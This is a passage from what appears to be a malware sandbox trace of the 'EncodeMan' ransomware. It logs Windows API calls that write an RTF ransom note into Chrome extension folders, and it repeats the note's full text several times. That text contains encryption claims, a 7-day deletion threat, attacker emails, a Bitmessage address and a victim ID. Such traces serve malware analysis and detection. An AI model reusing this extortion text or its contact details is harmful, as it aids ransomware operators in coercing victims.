COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.257] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.257] CloseHandle (hObject=0x2e8) returned 1 [0285.258] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0285.258] GetLastError () returned 0x2 [0285.258] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0285.258] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.258] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.258] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 